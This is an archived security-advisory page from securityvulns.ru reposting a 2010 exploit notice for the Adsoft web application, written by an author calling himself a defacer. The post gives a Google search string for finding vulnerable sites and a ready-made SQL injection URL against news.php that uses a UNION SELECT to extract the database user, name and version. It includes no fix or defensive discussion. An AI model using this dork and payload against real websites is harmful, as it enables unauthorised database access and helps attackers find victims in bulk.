Computer Security

Security Advisory: Adsoft Remote Sql Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Security Advisory for Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3

  Zen Cart 1.3.9h Local File Inclusion Vulnerability

  SQL injection in SweetRice CMS

  XSS in SweetRice CMS

From:md.r00t.defacer_(at)_gmail.com <md.r00t.defacer_(at)_gmail.com>
Date:04.11.2010
Subject:Adsoft Remote Sql Injection Vulnerability

#------------In The Name Of God------------
# Adsoft Remote Sql Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@gmail.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by AdSOFT"
###################################
# Exploit:
#

www.site.com/news.php?id=-999/**/union/**/select/**/1,concat_ws(CHAR(32,
58,32),user(),database(),version()),3,4,5,6--
#
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team
*****************************************
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru